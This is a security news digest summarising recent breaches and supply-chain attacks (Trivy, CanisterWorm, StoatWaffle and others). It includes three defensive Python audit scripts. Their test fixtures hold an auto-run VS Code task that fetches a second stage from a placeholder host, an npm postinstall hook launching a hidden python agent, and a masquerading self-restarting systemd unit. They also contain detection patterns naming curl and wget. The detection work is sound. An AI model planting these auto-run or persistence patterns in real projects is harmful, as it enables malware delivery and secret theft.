< ciso brief />

All news in category “Incidents and Data Breaches”

2732 articles · page 31 of 137

Crunchyroll Investigates Breach Affecting 6.8M Users

🔒 Crunchyroll is investigating claims that attackers stole personal data for roughly 6.8 million users after compromising a support agent's Okta SSO credentials. The actor says they accessed multiple applications, including Zendesk, Slack and Google Workspace, and downloaded about 8 million support tickets containing names, emails, IP addresses, locations and ticket contents. Payment details were reportedly present only where customers had volunteered them in tickets. The attacker demanded a $5 million extortion payment and, by their own account, received no response.

North Korean Actors Use VS Code Auto-Run for StoatWaffle

🛡️ The North Korean-linked group Contagious Interview (aka WaterPlum) is abusing Visual Studio Code auto-run tasks to distribute a Node.js-based malware family called StoatWaffle. Malicious projects use tasks.json with runOn: folderOpen to automatically fetch and install Node.js, then execute a downloader that chains to next-stage modules. StoatWaffle includes a browser credential stealer and a RAT capable of file operations, command execution, and data exfiltration.
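The auto-run trick above relies on a `.vscode/tasks.json` task whose `runOptions.runOn` is set to `folderOpen`. The script below is an added example, not code from the reporting or from the group described: it walks a checkout, parses VS Code's JSON-with-comments dialect (comments and trailing commas are legal there, so a strict JSON parser would miss many files), and reports every task that would start on folder open. The sample projects, the task label and the `downloads.example.invalid` staging URL are constructed for the demonstration and are not indicators from the incident.

```python
import json
import os
import re
import tempfile
from pathlib import Path

# Matches either a JSON string literal (captured) or a // or /* */ comment.
# Capturing strings first lets "https://..." inside a value survive comment stripping.
_JSONC_TOKEN = re.compile(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/', re.S)
_TRAILING_COMMA = re.compile(r",(\s*[}\]])")


def parse_jsonc(text):
    """Parse VS Code's JSON-with-comments (comments and trailing commas allowed)."""
    stripped = _JSONC_TOKEN.sub(lambda m: m.group(1) or "", text)
    return json.loads(_TRAILING_COMMA.sub(r"\1", stripped))


def task_command(task):
    """Flatten a task's command and args into one line for the report."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)


def find_autorun_tasks(root):
    """Walk `root` and report every task VS Code would start when the folder is opened."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) != ".vscode" or "tasks.json" not in files:
            continue
        path = Path(dirpath, "tasks.json")
        try:
            doc = parse_jsonc(path.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError) as exc:
            findings.append({"file": str(path), "label": None, "type": None,
                             "command": f"PARSE ERROR: {exc}"})
            continue
        for task in doc.get("tasks", []):
            if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                findings.append({
                    "file": str(path),
                    "label": task.get("label", "<unnamed>"),
                    "type": task.get("type"),
                    "command": task_command(task),
                })
    return findings


# Constructed fixture: one benign project and one using the auto-run pattern.
# The staging URL is a placeholder (.invalid TLD), not an indicator from the reporting.
MALICIOUS_TASKS_JSON = """\
{
  // Comments and trailing commas are legal in VS Code's JSON dialect
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Install dependencies",
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('https').get('https://downloads.example.invalid/stage2')"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
  ],
}
"""
BENIGN_TASKS_JSON = '{"version": "2.0.0", "tasks": [{"label": "build", "type": "npm", "script": "build"}]}'


def build_sample_tree():
    """Write the two constructed projects into a temp directory and return its root."""
    root = Path(tempfile.mkdtemp(prefix="vscode-audit-"))
    for project, content in (("clean-app", BENIGN_TASKS_JSON), ("interview-task", MALICIOUS_TASKS_JSON)):
        vscode_dir = root / project / ".vscode"
        vscode_dir.mkdir(parents=True)
        (vscode_dir / "tasks.json").write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    for hit in find_autorun_tasks(build_sample_tree()):
        print(f"{hit['file']}: [{hit['label']}] {hit['command']}")
```

Point it at a cloned "coding test" before opening it in the editor; anything it reports should be read before the folder is trusted. As a baseline control, VS Code's `task.allowAutomaticTasks` setting can be set to `off` so that folder-open tasks never run without an explicit prompt.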

Trivy Supply-Chain Attack Spreads to Docker and GitHub

🔔 The TeamPCP threat actor extended its Trivy supply‑chain attack by pushing malicious Docker images and hijacking Aqua Security's GitHub organization, tampering with multiple repositories. Security researchers and Socket identified Docker Hub images tagged 0.69.5 and 0.69.6 that lack corresponding GitHub releases and contain indicators of compromise linked to the TeamPCP Cloud stealer. Aqua said incomplete token rotation after an earlier incident allowed attackers to reuse credentials, and the company published safe Trivy releases while engaging Sygnia to investigate and remediate.

Tycoon2FA Phishing Service Rapidly Resumes Activity

🛡️ Tycoon2FA, a subscription-based phishing-as-a-service platform, has resumed operations following a coordinated takedown that seized 330 domains. The service uses adversary-in-the-middle techniques to intercept live authentication sessions and bypass multifactor authentication, and it continues to deploy AI-generated decoy pages and malicious URLs. CrowdStrike reported multiple suspected Tycoon2FA-enabled incidents in early March. Organisations are urged to prioritise continuous detection, real-time signal correlation, and layered defences to counter this adaptive threat.

Predictive Shielding in Defender Stops GPO-Based Ransomware

🛡️ Microsoft Defender's predictive shielding disrupted a GPO-based ransomware campaign targeting a large educational institution with more than two thousand devices. The attacker created malicious GPOs to disable protections and deploy scheduled tasks via the SYSVOL share; Defender detected policy tampering and applied GPO hardening, temporarily pausing policy propagation. Roughly 700 devices were hardened within hours, preventing any encryption via the GPO path and contributing to an overall ~97% protection rate. Combined with attack disruption that blocked compromised accounts and lateral movement, the intervention contained the incident and limited impact from concurrent SMB-based ransomware activity.

CanisterWorm Wiper Targets Iran via Compromised Cloud

🚨 A financially motivated group known as TeamPCP deployed a self‑propagating worm called CanisterWorm that spreads through poorly secured cloud control planes and conditionally executes a destructive wiper on systems set to Iran’s timezone or Farsi locale. The actors leveraged exposed Docker APIs, misconfigured Kubernetes clusters, Redis servers and the React2Shell vector, and inserted credential‑stealing code into official Trivy releases via compromised GitHub Actions. Researchers observed the group using ICP canisters to host payloads and noted the malicious builds were active only intermittently, leaving uncertainty about the extent of successful data destruction.

Trivy Supply-Chain Attack Expands With New Docker Images

🛡️ Researchers have identified additional compromised Docker images tied to the Trivy supply‑chain incident after attackers injected credential‑stealing malware into official releases and GitHub Actions. New Docker tags 0.69.5 and 0.69.6 were uploaded on March 22 without matching GitHub releases and contain IOCs linked to the TeamPCP infostealer. Aqua Security confirmed repository tampering and advised teams to treat CI/CD scans as potentially compromised while noting its commercial products appear unaffected.

Hardware Boot-ROM Exploit Completely Compromises Xbox One

🔓 A researcher developed a hardware voltage-glitching exploit, dubbed Bliss, that targets the Xbox One boot ROM to bypass early ARM Cortex memory protections. By inducing two precisely timed voltage collapses, the attacker can skip critical setup and redirect execution into attacker-controlled data. The exploit is a silicon-level, unpatchable compromise that enables loading unsigned code and accessing the console’s security processor.

Microsoft: IRS-themed Phishing Hits 29,000, RMM Abused

⚠️ Microsoft reported large-scale IRS-themed phishing campaigns in February 2026 that targeted more than 29,000 users across 10,000 organizations, using tax refund, payroll and W‑2 lures to harvest credentials and deliver remote access tools. Attackers leveraged Phishing-as-a-Service kits (notably Energy365 and SneakyLog/Kratos) and abused legitimate RMM products such as ScreenConnect, Datto, and SimpleHelp to maintain persistent access. Microsoft advises enforcing 2FA, applying conditional access, and blocking malicious domains and payloads to reduce exposure.

FBI: Handala Hackers Use Telegram for Malware C2 Operations

🔐 The FBI warns that Iranian-linked actors, including Handala and a state-associated Homeland Justice group, are using Telegram as command-and-control infrastructure in Windows malware campaigns. Attackers employ social engineering to install malware that exfiltrates screenshots and files from journalists, dissidents, and opposition groups worldwide. The alert followed the seizure of four clearnet domains and references prior disruptive operations such as Handala's attack on Stryker.

Behavioral XDR, Threat Intel Nab North Korean Fake Hire

🔎 Behavioral analytics and threat intelligence combined to identify a suspected North Korea-linked fake IT worker within 10 days of hire. LevelBlue SpiderLabs and Cybereason XDR flagged geolocation anomalies, unmanaged device access, and use of Astrill VPN, triggering a high-severity alert and timely account revocation. Organizations should enforce Entra ID Conditional Access, manage endpoints, and maintain software baselines to detect such insider threats.

Operation Alice: Over 373,000 Dark Web Sites Dismantled

🛡️ A Europol-backed, German-led operation has dismantled over 373,000 .onion sites tied to a fraudulent platform called Alice with Violence CP that advertised child sexual abuse material (CSAM) and cybercrime-as-a-service. The multi-year investigation, concentrated between 9–19 March, turned thousands of decoy domains into an honeypot that helped identify 440 customers. Authorities have issued an international arrest warrant for an alleged Chinese operator and continue probes into more than 100 suspects.

Trivy supply-chain breach spreads infostealer via Docker

🚨 Researchers uncovered trojanized Trivy images on Docker Hub after a supply-chain compromise that pushed malicious releases to developer environments. The last known clean release is 0.69.3; tags 0.69.4–0.69.6 were removed after analysis linked several images to the TeamPCP infostealer. The incident also affected related GitHub Actions and spawned downstream npm compromises and repository defacements.

Trivy Supply-Chain Breach Pushes Infostealer via GitHub

🛡️ The Trivy vulnerability scanner was compromised in a supply-chain attack that injected an infostealer into official releases and GitHub Actions. Researchers attribute the campaign to TeamPCP, which trojanized the trivy binary (v0.69.4) and replaced GitHub Action entrypoints, affecting many trivy-action tags. The malware harvested a broad range of credentials, exfiltrated data to a typosquatted C2, and deployed persistence on infected hosts. Organizations using affected versions should assume full compromise and rotate secrets immediately.

Azure Monitor alerts abused for callback phishing campaigns

⚠️ Microsoft Azure Monitor alerts are being abused to distribute callback phishing messages that impersonate billing and security notices. Attackers create alert rules with custom descriptions and configure them to send emails to lists they control, causing legitimate azure-noreply@microsoft.com messages to reach targets and pass SPF/DKIM/DMARC checks. Recipients are urged to call listed numbers, a tactic that can lead to credential theft, payment fraud, or remote access compromise.

FBI: Russian-Linked Phishing Targets Signal, WhatsApp

🔒 U.S. agencies warn that threat actors aligned with Russian intelligence are conducting targeted social-engineering phishing campaigns to compromise commercial messaging apps such as Signal and WhatsApp. The attacks have led to unauthorized access to thousands of accounts and involve impersonation of support personnel to request SMS codes, verification PINs, or to deliver malicious QR links. Victims who provide codes can lose account control, while those who scan attacker-controlled QR codes may have past and future messages exposed. Authorities advise never sharing verification codes and regularly reviewing linked devices in app settings.

CanisterWorm: npm Worm Spreads via Trivy Supply-Chain Attack

🛡️ The actors behind the Trivy supply-chain compromise are now suspected of seeding a self-propagating worm called CanisterWorm, which uses an ICP canister (Internet Computer blockchain smart contract) as a decentralized dead drop for command-and-control. The chain abuses an npm postinstall hook to drop a Python backdoor and establishes persistence via a masquerading systemd user service that restarts automatically. A new variant harvests local npm tokens during postinstall and launches an automated propagation routine, turning compromised developers and CI pipelines into unwitting distributors.
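The two footholds named above, an npm lifecycle hook that runs at install time and a user-level systemd service that restarts itself, are both cheap to enumerate on a developer workstation or CI runner. The script below is an added example, not code from the reporting or from any of the projects involved: it lists every `preinstall`/`install`/`postinstall`/`prepare` hook under a `node_modules` tree and flags ones that spawn interpreters or downloaders, and it flags user `.service` units that auto-restart while executing anything outside package-manager-owned paths. The package names, unit names and `/home/dev/.local/share/.cache/agent.py` path are constructed placeholders, not indicators from the worm.

```python
import json
import re
import tempfile
from configparser import ConfigParser
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Interpreters and downloaders that an install hook rarely needs for legitimate reasons.
SUSPICIOUS_TOKENS = re.compile(r"\b(python3?|curl|wget|base64|nohup|(?:ba)?sh\s+-c)\b")
# Executables and script paths under these prefixes are treated as package-manager owned.
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/", "/opt/", "/snap/")


def audit_lifecycle_scripts(node_modules):
    """List every install-time hook under node_modules; flag ones that spawn extra tooling."""
    findings = []
    for manifest_path in sorted(Path(node_modules).rglob("package.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                findings.append({
                    "package": manifest.get("name", manifest_path.parent.name),
                    "hook": hook,
                    "command": scripts[hook],
                    "suspicious": bool(SUSPICIOUS_TOKENS.search(scripts[hook])),
                })
    return findings


def audit_user_units(unit_dir):
    """Flag user services that auto-restart and execute code from outside system paths."""
    findings = []
    for unit in sorted(Path(unit_dir).glob("*.service")):
        cp = ConfigParser(interpolation=None, strict=False)  # unit files are INI-like
        cp.read(unit, encoding="utf-8")
        exec_start = cp.get("Service", "ExecStart", fallback="").strip()
        restart = cp.get("Service", "Restart", fallback="no").strip()
        # Every absolute path on the ExecStart line (binary and script arguments) is checked,
        # so '/usr/bin/python3 /home/x/.cache/agent.py' is caught through its second token.
        paths = [tok for tok in exec_start.lstrip("-@+!:").split() if tok.startswith("/")]
        untrusted = [p for p in paths if not p.startswith(TRUSTED_PREFIXES)]
        if untrusted and restart in ("always", "on-failure"):
            findings.append({"unit": unit.name, "exec": exec_start,
                             "restart": restart, "paths": untrusted})
    return findings


# Constructed fixture: a benign and a hooked package, a benign and a masquerading unit.
FIXTURE = {
    "node_modules/text-padding/package.json": json.dumps(
        {"name": "text-padding", "scripts": {"test": "node test.js"}}),
    "node_modules/palette-helper/package.json": json.dumps(
        {"name": "palette-helper", "scripts": {
            "postinstall": "node setup.js && python3 $HOME/.local/share/.cache/agent.py"}}),
    "units/pipewire.service": "[Service]\nExecStart=/usr/bin/pipewire\nRestart=on-failure\n",
    "units/dbus-session-helper.service": (
        "[Unit]\nDescription=D-Bus session helper\n[Service]\n"
        "ExecStart=/usr/bin/python3 /home/dev/.local/share/.cache/agent.py\nRestart=always\n"
        "[Install]\nWantedBy=default.target\n"),
}


def build_fixture():
    """Write the constructed files to a temp directory; return (node_modules, unit_dir)."""
    root = Path(tempfile.mkdtemp(prefix="persistence-audit-"))
    for rel, content in FIXTURE.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
    return root / "node_modules", root / "units"


if __name__ == "__main__":
    node_modules, units = build_fixture()
    for f in audit_lifecycle_scripts(node_modules):
        print(f"{'!!' if f['suspicious'] else '  '} {f['package']} {f['hook']}: {f['command']}")
    for f in audit_user_units(units):
        print(f"!! {f['unit']} Restart={f['restart']} runs {f['paths']}")
```

On a real host, run `audit_lifecycle_scripts("node_modules")` in the project and `audit_user_units(Path.home() / ".config/systemd/user")` for the current user; a unit whose name imitates a desktop component but executes a script under `$HOME` is the pattern described above. Installing with `npm ci --ignore-scripts` prevents lifecycle hooks from running at all, at the cost of packages that genuinely need a build step.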

Trivy scanner backdoored in supply-chain compromise

⚠ The widely used Trivy vulnerability scanner and its official GitHub Actions were backdoored after attackers injected a credential‑stealing payload into official releases, the trivy-action and setup-trivy components, and published binaries. The malware harvests pipeline secrets by reading process memory and searching filesystems for SSH keys, cloud credentials, Kubernetes tokens, Docker configs, and wallets, exfiltrating encrypted data to a typosquatted domain or, failing that, by creating a public repository named tpcp-docs. Researchers say the intrusion followed an earlier compromise and incomplete credential rotation that let attackers regain access via insecure GitHub Actions; victims should rotate secrets immediately and pin Actions to full commit SHAs. Known safe versions include Trivy v0.69.3, trivy-action tag 0.35.0, and setup-trivy 0.2.6.

FBI Links Signal Phishing to Russian Intelligence Services

🔔 The FBI has publicly attributed widespread phishing campaigns against encrypted messaging apps—primarily Signal and, to a lesser extent, WhatsApp—to actors linked to Russian intelligence services. The adversaries do not break end-to-end encryption; they hijack accounts via social engineering, commonly tricking victims into sharing verification codes or scanning malicious QR codes. Thousands of accounts worldwide have reportedly been compromised, often targeting individuals with sensitive access. Authorities urge users to refuse unsolicited device-linking requests and never share verification codes.

Trivy GitHub Actions Breach: 75 Tags Hijacked

🔒 The Trivy open-source scanner and its GitHub Actions integrations (aquasecurity/trivy-action and aquasecurity/setup-trivy) were compromised in March 2026 when an attacker force-pushed 75 version tags to point to malicious commits. The injected Python infostealer harvests CI/CD secrets from runners, attempts exfiltration to an attacker-controlled domain, and can stage stolen data using captured PATs if network exfiltration fails. Vendors advise immediate secret rotation, blocking the malicious domain/IP, and pinning Actions to full commit SHAs.
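The Trivy items on this page share one remediation: pin Actions to full commit SHAs rather than to tags that can be force-pushed, and stop using the trojanized scanner versions (0.69.3 is named as the last clean release, 0.69.4 through 0.69.6 as the compromised tags). The script below is an added example, not tooling from Aqua Security or the researchers quoted: it audits a workflow file line by line for `uses:` references that are not 40-hex SHAs, `image:` references with no digest, and Trivy versions in the compromised range, whether they appear as a container image tag or as the `version:` input of `setup-trivy`/`trivy-action`. The sample workflow and its 40-hex placeholder SHA are constructed; a real audit should re-read `version` handling against the actions' current documentation, and the "verify" status deliberately punts on releases newer than the advisory text rather than guessing which later builds are safe.

```python
import re

# Line patterns for a dependency-free, line-based audit; a YAML parser would be stricter.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w.-]+)(?:/[^@\s]*)?@(\S+)")
IMAGE_RE = re.compile(r"^\s*image:\s*(\S+)")
VERSION_RE = re.compile(r"^\s*version:\s*(\S+)")
STEP_START_RE = re.compile(r"^\s*-\s")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Versions named in the incident reporting: 0.69.3 is the last known clean Trivy
# release; 0.69.4, 0.69.5 and 0.69.6 are the trojanized tags.
LAST_CLEAN_TRIVY = (0, 69, 3)
COMPROMISED_TRIVY = {(0, 69, 4), (0, 69, 5), (0, 69, 6)}
TRIVY_ACTIONS = {"aquasecurity/trivy-action", "aquasecurity/setup-trivy"}
TRIVY_IMAGES = {"aquasec/trivy", "ghcr.io/aquasecurity/trivy"}


def parse_version(text):
    """'v0.69.4' or '0.69.4' -> (0, 69, 4); None if it is not a dotted version."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip("'\""))
    return tuple(int(x) for x in m.groups()) if m else None


def trivy_status(version):
    """Classify a Trivy version tuple: compromised / pre-incident / verify."""
    if version in COMPROMISED_TRIVY:
        return "compromised"
    if version <= LAST_CLEAN_TRIVY:
        return "pre-incident"
    return "verify"  # newer than the advisory text: check the vendor's safe-release list


def split_image(image):
    """'aquasec/trivy:0.69.5@sha256:...' -> ('aquasec/trivy', '0.69.5', 'sha256:...')."""
    name_tag, _, digest = image.partition("@")
    name, sep, tag = name_tag.rpartition(":")
    if not sep or "/" in tag:  # no tag at all, or the ':' belonged to a registry port
        name, tag = name_tag, "latest"
    return name, tag, digest


def audit_workflow(text):
    """Return (line, kind, detail) findings for one GitHub Actions workflow."""
    findings = []
    current_action = None  # action whose `with:` block the cursor is inside, if any
    for lineno, line in enumerate(text.splitlines(), 1):
        if STEP_START_RE.match(line):
            current_action = None
        if m := USES_RE.match(line):
            repo, ref = m.groups()
            current_action = repo
            if not FULL_SHA_RE.match(ref):
                findings.append((lineno, "unpinned-action", f"{repo}@{ref}"))
        elif m := IMAGE_RE.match(line):
            name, tag, digest = split_image(m.group(1))
            if not digest:
                findings.append((lineno, "unpinned-image", m.group(1)))
            version = parse_version(tag)
            if name in TRIVY_IMAGES and version and trivy_status(version) == "compromised":
                findings.append((lineno, "compromised-trivy", m.group(1)))
        elif (m := VERSION_RE.match(line)) and current_action in TRIVY_ACTIONS:
            version = parse_version(m.group(1))
            if version and trivy_status(version) == "compromised":
                findings.append((lineno, "compromised-trivy",
                                 f"{current_action} version {m.group(1)}"))
    return findings


# Constructed workflow for the demonstration; the 40-hex SHA is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: scan
jobs:
  trivy:
    runs-on: ubuntu-latest
    container:
      image: aquasec/trivy:0.69.5
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/setup-trivy@v0.2.6
        with:
          version: v0.69.4
      - name: Run Trivy
        uses: aquasecurity/trivy-action@0.35.0
        with:
          scan-type: fs
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
"""

if __name__ == "__main__":
    for lineno, kind, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {lineno:>3}  {kind:<18} {detail}")
```

Run it over `.github/workflows/*.yml` in every repository that consumed Trivy; the "unpinned-action" findings are the structural fix (a SHA cannot be moved the way the 75 tags were), while "compromised-trivy" findings identify runners whose secrets should be treated as exposed and rotated.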